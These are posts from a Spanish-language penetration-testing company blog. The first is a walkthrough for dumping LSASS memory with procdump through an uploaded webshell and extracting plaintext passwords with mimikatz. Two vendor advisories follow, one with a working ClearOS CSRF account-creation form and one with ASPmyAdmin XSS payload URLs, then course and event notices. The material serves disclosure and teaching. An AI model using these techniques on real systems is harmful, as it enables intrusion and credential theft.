lunes, 20 de enero de 2014

EXTRAYENDO CONTRASEÑAS DE LA RAM CON MIMIKATZ 2.0 (ALFA)

Luego de “Sacando credenciales hasta del bolsillo” en @peruhackcon2013 he recibido algunas consultas sobre como utilizar mimikatz 2.0 (ALFA), esta herramienta puede ser particularmente útil durante la etapa de explotación de vulnerabilidades en un servicio de pentest, por ejemplo la explotación de una aplicación web vulnerable a carga de archivos (File Upload) sin restricciones en muchos ataques es el primer paso para tomar control del sistema objetivo.

A continuación, el ataque sólo tiene que encontrar la manera de ejecutar código luego de subir la respectiva webshell "phpshel.php" vemos que nos encontramos con permisos de "NT AUTHORITY\SYSTEM" y queremos extraer la clave del "Administrator", lo primero que pensamos es "la hago con meterpreter" y cuando logramos subirlo el antivirus del servidor web afectado reconoce dicha herramienta como código "malicioso"...

Para este caso podríamos utilizar la técnica que nos presenta mimikatz 2.0 (ALFA) puesto que en esta nueva versión ya no es necesario “inyectar” la librería "sekurlsa.dll" en el proceso de LSASS mimikatz# inject::process lsass.exe sekurlsa.dll, en esta nueva versión la técnica se basa en la obtención de contraseñas en texto plano volcando el proceso LSASS.EXE desde la memoria RAM, sin necesidad de ejecutar código "malicioso" en el servidor, de esta forma se evita tener que lidiar con técnicas de evasión antivirus y otros dolores de cabeza.

En este post me gustaría mostrar paso a paso como podemos usar la funcionalidad de mimikatz 2.0 (ALFA) explotando una aplicación web vulnerable a carga de archivos sobre un servidor Windows 2008.

1.SUBIENDO LAS HERRAMIENTAS
Subir las herramientas usando una aplicación vulnerable a carga de archivos (File Upload).
En caso de tener problemas para hallar la ruta en donde se han almacenado los archivos cargados en el servidor, podríamos usar Dirbuster para tratar de descubrir el directorio en donde se encuentren nuestros archivos en este caso se hallaron en "/webapp/admin/panel/images/"

phpshell.php; para realizar la ejecución de comandos en el servidor web afectado.
procdump.exe; nos permitirá realizar el volcar el espacio de memoria RAM del proceso LSASS.EXE a un archivo.dmp (dump)

Subiendo "WebShell" al servidor

Subiendo "procdump" al servidor


2.VOLCANDO LA RAM DEL SERVIDOR WEB

Ejecución del comando "dir" en el servidor para confirmar se logro subir la herramienta procdump.exe y el script desde donde se ejecutara (script.dumper.bat)

Usaremos Procdump para volcar el espacio de la memoria RAM asignado al proceso LSASS.EXE y generar archivo “dump” que se usará fuera de linea para conseguir la contraseña del "Administrador local" y/o del "Domain Admin".

Ejecución comando "dir" mediante phpshell.php?cmd=dir

Como utilizo procdump.exe?

Se ejecutara desde el archivo script.dumper.bat donde llamaremos a procdump.exe y le pasaremos los siguientes parámetros:

-accepteula : opción de línea de comando para aceptar automáticamente el contrato de licencia de Sysinternals.
-ma : escribir un archivo de volcado con toda la memoria del proceso. El formato de volcado predeterminado sólo incluye hilos (threads) del proceso e información de gestión.

Por último la ubicación donde se guardara el archivo con el volcado del proceso lsass.exe (C:\xampp\htdocs\webapp\admin\panel\images\) una ubicación donde se pueda descargar vía el servidor web.

Procdump : http://technet.microsoft.com/sysinternals/dd996900.aspx

type script.dumper.bat
C:\xampp\htdocs\webapp\admin\panel\images\procdump.exe 
-accepteula
-ma lsass.exe
C:\xampp\htdocs\webapp\admin\panel\images\%COMPUTERNAME%_lsass.dmp
Contenido del script "script.dumper.bat"

Como ejecutar script.dumper.bat en el servidor web?

Ejecución script.bat mediante phpshell.php?cmd=script.dumper.bat

Descargar el archivo “dump” para explotarlo con #mimikat

Descarga del volcado de la RAM desde el directorio web


3.USANDO MIMIKATZ 2.0 - Modulo MINIDUMP!!

Descargar mimikatz desde el repositorio oficial gentilkiwi, descomprimir e ingresar desde la consola de comandos ejecutando mimikatz.exe.

mimikatz # privilege::debug
mimikatz # sekurlsa::minidump nombre-del-archivo-dump-descargado.dmp
mimikatz # sekurlsa::logonpasswords


Listado de Archivos.

Enumeración de hashes y claves en texto plano del usuario Administrador


Herramientas utilizadas:
Mimikatz: http://blog.gentilkiwi.com/securite/mimikatz/minidump
Procdump: http://technet.microsoft.com/en-us/sysinternals/dd996900.aspx

No aplicar este material ni conocimientos sin el consentimiento explícito que autorice a hacerlo.(leer descargo de responsabilidades)




sábado, 11 de mayo de 2013

OSEH @ 2013 : Una nueva oportunidad !

A menudo escriben a consultarnos sobre la apertura del Open Sec Ethical Hacker (OSEH) debido a que ya son conocidas las expectativas que este curso genera, por lo tanto, les comunicamos que la fecha esta fijada para los días 21, 22 y 23 de Junio. Este curso solo se dicta al público en general 1 vez al año, así que, no pierdan esta gran oportunidad.

Es común, en estos días, recibir una serie de correos enviando información sobre cursos y seminarios de los cuales no se tiene mucha información, todos prometen el oro y el moro.  Es ahí donde tomas la decisión de asistir, finalmente, llevándote una gran decepción (en la mayoría de los casos), donde perdiste tiempo, dinero y sobre todo las cosas que antes conocías poco o tal vez nada,  ahora no han quedado claras o, peor aún, te llevas una idea errónea de las cosas.

Que nos diferencia de los demás? Somos PROFESIONALES que formamos un equipo de consultores llamado OPEN SEC quienes día a día comprobamos y explotamos en clientes diversas vulnerabilidades de diversos fabricantes. Nosotros compartimos nuestras experiencias en el curso (OSEH) de una manera 100% práctica, donde al finalizar el curso conocerás los errores más comunes que se pueden cometer, así como evaluar tu propia aplicación web, tu propia infraestructura y así buscar soluciones para estar a buen recaudo.


Finalmente, Oscar Martinez, Magister en Ciencias de la Computación, una de las personas con más amplios conocimientos a nivel nacional en seguridad informática, Ethical Hacking y Pentesting, así como certificados que avalan sus conocimientos, ha publicado en su blog una comparativa interesante sobre los cursos de Ethical Hacking y pentesting.  Sí te queda alguna duda sobre qué curso debes elegir, te recomendamos despejes esas dudas aquí.

viernes, 11 de enero de 2013

Advisory CSRF-ClearOS 10012013


Advisory ID: OS002

Product: ClearOS
Created by: Clear Foundation (http://www.clearfoundation.com/Foundation/core-team-honor-roll.html)
Vulnerable Version(s): 6.X.X
Tested Version: 6.1.0 - 6.3.0

Vulnerability Type: Cross-Site Request Forgery (CSRF) [CWE-352]
Public Disclosure : No yet
Vendor status : Notified
Vendor Answer : "We expect these to be resolved for the ClearOS 6.4.0 Beta 2 (due later this month)."

CVSS Base Score: 5.8
CVSS Temporal Score: 4.8
CVSS Environmental Score: 4.8

Researcher: Camilo Galdos, Security Consultant @ Open-sec ( http://www.open-sec.com/ )

Advisory Details :

Camilo Galdos, Security Consultant at Open-Sec discovered a vulnerability in ClearOS, which can be exploited to remotely add accounts to the ClearOS system by making the Administrator access a link.

Vulnerability Description: Cross-Site Request Forgery (CSRF) in ClearOS:

90% of the forms in ClearOS and Modules do not use a Token to correctly verify if the form is being send by the administrator or user in ClearOS.
Examples of URLs that lead to exploit this vulnerability are:

https://127.0.0.1:81/app/users/edit/get

POST:

user_info%5Bcore%5D%5Busername%5D=get&user_info%5Bcore%5D%5Bfirst_name%5D=Get&user_info%5Bcore%5D%5Blast_name%5D=ClearOS&password=clear&verify=clear&user_info%5Bplugins%5D%5Bftp%5D%5Bstate%5D=0&user_info%5Bplugins%5D%5Bopenvpn%5D%5Bstate%5D=0&user_info%5Bplugins%5D%5Bpptpd%5D%5Bstate%5D=0&user_info%5Bplugins%5D%5Bprint_server%5D%5Bstate%5D=0&user_info%5Bplugins%5D%5Bsmtp%5D%5Bstate%5D=0&user_info%5Bplugins%5D%5Buser_certificates%5D%5Bstate%5D=0&user_info%5Bplugins%5D%5Bweb_proxy%5D%5Bstate%5D=0&user_info%5Bextensions%5D%5Bshell%5D%5Blogin_shell%5D=%2Fsbin%2Fnologin&submit=Update


https://127.0.0.1:81/app/users/add

POST:
user_info%5Bcore%5D%5Busername%5D=usernametest&user_info%5Bcore%5D%5Bfirst_name%5D=firstnametest&user_info%5Bcore%5D%5Blast_name%5D=lastnametest&password=l0l123&verify=l0l123&user_info%5Bplugins%5D%5Bweb_proxy%5D%5Bstate%5D=1&submit=Add

Exploit:

<html>
<title>CSRF ClearOS</title>
<h1>CSRF ClearOS ~ Open-Sec</h1>

<form name="lol" id="lol" class="theme-form" action="https://192.168.1.40:81/app/users/add" method="post" accept-charset="utf-8" autocomplete="off">
<input type="hidden" name="user_info[core][username]" value="Dedalo"/>
<input type="hidden" name="user_info[core][first_name]" value="Camilo"/>
<input type="hidden" name="user_info[core][last_name]" value="Galdos"/>
<input type="hidden" name="password" value="p455w0rd"/>
<input type="hidden" name="verify" value="p455w0rd"/>
<input type="submit" name="submit" value="Add"/>
</form>
</html>


Impact: Administrators can be scammed to visit a link and when they visit it they automaticaly create a new user or edit a user or change a password or anything that is in a form because almost no form has a token to validate.

Solution:

To fix this kind of vulnerability (CSRF) you must put an authentication token in every form to validate that the form is being sent from an specified module or page. Owasp have different examples in different Programming Languages so you can take one in example to patch this vulnerability.

https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet


Contact Information: For additional details, feel free to contact Camilo Galdos at cgaldos[at]open-sec.com


About Open-Sec:

Open-Sec is a Perú based company focused on penetration testing and security incidents investigation services. With customers at Perú, Ecuador, Panamá and Honduras, Open-Sec provides consulting services through a team of certified and experienced consultants.

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. 

lunes, 29 de octubre de 2012

Advisory XSS-ASPMyAdmin 10102012


Advisory ID: OS001

Product: ASPmyAdmin
Created by: Sukalyan Chakraborty
Vulnerable Version(s): NA
Tested Version: NA

Vulnerability Type: Reflected Cross-Site Scripting [CWE-712]
Public Disclosure: October 10, 2012
Vendor status : Notified
CVSS Base Score :5.8
CVSS Temporal Score 5.8
CVSS Environmental Score 7.5
Researcher: Alfredo García, Senior Security Consultant @ Open-sec ( http://www.open-sec.com/ )

Advisory Details :

Alfredo García, Senior Security Consultant at Open-Sec discovered a vulnerability in ASPmyAdmin, which can be exploited to perform Multiple Cross-Site Scripting (XSS) and arbitrary HTML injection attacks.

Vulnerability Description : Multiple Cross-Site Scripting (XSS) in ASPmyAdmin:

ASPMyAdmin includes ASP scripts that fail to adequately sanitize output strings coming from user-supplied input . By leveraging this issue, an attacker may be able inject arbitrary HTML and Javascript code to be executed in a user's browser within the security context of the affected victim.
At least, the following scripts are vulnerable using the dbName parameter through GET :
db_info.asp
db_table.asp
db_view.asp
db_procedure.asp
db_sql.asp
db_drop.asp

Examples of URLs that lead to exploit this vulnerability are :

http://www.host.com/db_table.asp?dbName=<script>alert(document.cookie)</script>
http://www.host.com/db_procedure.asp?dbName=<script>window.alert('Open-Sec')</script>
Impact : Victims are exposed to unwanted content, modified content, redirection to other site and/or content, user's session cookies stealing, browser-based attacks, etc.

Solution:

To fix this kind of vulnerability (XSS), you colud establish a web application firewall, but, actually, you must validate all output strings. You must validate that the output is the type, length and format are the expected ones. For more information on prevention, visit :https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet

Also, check out the following link to implement web application security based on ESAPI
https://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API

Contact Information : For additional details, feel free to contact Alfredo Garcia at agarcia@open-sec.com


About Open-Sec : 

Open-Sec is a Perú based company focused on penetration testing and security incidents investigation services. With customers at Perú, Ecuador, Panamá and Honduras, Open-Sec provides consulting services through a team of certified and experienced consultants.

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. 

martes, 9 de octubre de 2012

Webminar : Implantación y certificación de la norma PCI DSS




Open-Sec , en alianza con  Internet Security Auditors tiene el agrado de invitarlos al webminar "Implantación y certificación de la norma PCI DSS"

Instituciones y organizaciones que almacenen, procesen y/o transmitan información de titulares de tarjetas, debe cumplir la norma PCI DSS, para evitar fraudes o robos de información confidencial. El webminar tiene como objetivo brindar el marco general de la norma, el proceso de implementación y su posterior certificación.

A continuación los detalles de la charla:

Horario
23 de octubre de 2012, 10:00 a.m. Lima (17:00 CET) - 11:30 a.m. Lima (18:30 CET)

Temario

10:00 Bienvenida al webinar
  10:05 Introducción a PCI DSS
              i) ¿Qué es PCI DSS?
              ii) Otras Normas PCI: PA-DSS, P2PE, PTS
              iii) Aplicabilidad
              iv) Programas de Cumplimiento de las Marcas
  10:25 Implantación PCI DSS (40 minutos)
             i) Proceso de Implantación
             ii) Ámbito de Cumplimiento (Scope)
             iii) Técnicas de reducción del Ámbito
                 a. Eliminación
                 b. Segmentación
                 c. Tokenización
                 d. P2PE
  11:00 Certificación PCI DSS
              i) Proceso de auditoría
              ii) Mantenimiento de la certificación
  11:15 Turno de preguntas
  11:30 Fin del webinar

Ponente
Miguel Ángel Domínguez

Biografía:
Miguel Ángel Domínguez es socio y co-fundador de Internet Security Auditors, y dirige el departamento de Consultoría que lidera los proyectos de implantación de la norma PCI DSS. Ha desarrollado su carrera profesional en el ámbito de la auditoría y la consultoría de seguridad de sistemas de información, colaborando en la metodología OSSTMM que se ha convertido en estándar de auditoría para pentesting. Está certificado PCI QSA, PA QSA, CISA, CISSP, ISO27001 Lead Auditor Instructor, CGEIT, SBCI y OPST. Es Licenciado en Ingeniería Informática por la Universidad Autónoma de Barcelona y Máster en Seguridad TI y Comercio Electrónico por La Salle.

Para registrarse al evento , escribir a : info@open-sec.com

viernes, 14 de septiembre de 2012

Meses de eventos internacionales para Open-Sec


A pesar de la dinámica del día a día de los proyectos y nuestra constante falta de tiempo, siempre tratamos de participar en eventos, a los cuales tenemos el gusto y honor de ser invitados.

Sin embargo este mes en particular nos ha tocado una agenda bastante interesante, en cuanto a participación a eventos se refiere,  ya que en esta oportunidad,  nos  toca  tener  presencia  fuera de nuestras fronteras e inclusive, en el continente vecino.






Campus Party Quito 2012 se realizará del 19 al 23 de septiembre en el Centro de Exposiciones  y Convenciones Mitad del Mundo, Cemexpo, donde se darán cita campuseros de todos los rincones del país.
Cabe señalar que Campus Party es el acontecimiento de Internet mas importante del mundo en las áreas de Innovación, Creatividad, Ciencia y Ocio Digita y se desarrolla actualmente en mas de 8 Países alrededor del Mundo.
El evento espera recibir a más de 2,500 personas, y  contará con charlas y exposiciones sobre  ciencia, cultura digital, innovación, desarrollo de video juegos, entre otros.
En esta oportunidad Open-Sec  participará  en el  área de  Seguridad y Redes con dos charlas:

- Convirtiendo un browser en una herramienta de Hacking ,
La cual estará a cargo de Walter Cuestas
(@wcu35745) Actual Gerente General y co-fundador de Open-Sec.

- Hackeando Cajeros automáticos, desde el punto de vista de un pentester
Dirigida por Mauricio Urizar
(@MauricioUrizar) , consultor sénior de la empresa.

También desarrollaremos, un taller sobre nmap , en donde se verán técnicas para el escaneo de puertos y servicios, análisis de vulnerabilidades y explotar como explotarlas.

La lista completa de charlas y ponentes la pueden encontrar aquí :







Este año dos grandes e importantes eventos se juntan, VoIP2Day + ElastixWorld, convirtiéndose en una cita obligatoria para miles de profesionales del sector de la telefonía y comunicaciones en todo el Mundo.

VoIP2Day + ElastixWorld se llevará a cabo los días 25,26 y 27 de Septiembre en la Feria  IFEMA : en Madrid, España

En donde Juan Oliva (@jroliva) consultor de Opens-Sec , participará con la charla :

- Ethical hacking a plataformas Elastix


La lista completa de charlas la pueden encontrar aquí :





Esto sin duda nos llena de orgullo y felicidad,  a todos los que conforman el equipo de Open-Sec, ya que seremos los únicos peruanos en participar en el Campus Party Quito 2012  y en el caso  VoIP2Day y ElastixWorld 2012 el único peruano hablando de ethical hacking en Europa, algo que no se habia presentado, desde hace mucho tiempo.

jueves, 30 de agosto de 2012

Memorias del Open-Sec Ethical Hacker – Lima 2012 (Agosto)



Tal como fue anunciado el pasado 17,18 y 19 de agosto realizamos nuestro entrenamiento intensivo en Ethical Hacking (OSEH) , en esta oportunidad abierto para el público.

Fue una jornada muy intensa, durante las 24 horas de entrenamiento, hubo mucha participación durante los retos y trabajo en equipo.

Queremos compartirles algunos comentarios recogidos, los cuales demuestra la madurez de nuestra propuesta de entrenamiento y hace nuestra certificación válida, no solo a nivel nacional, si no también internacional.

Testimonios :




Este es un correo de un participante, el cual apreciamos mucho, ya que no solo manifiesta los aspectos  diferenciales de nuestro curso, si no también elementos, que tenemos que seguir mejorando del mismo.




Algunas imágenes del curso: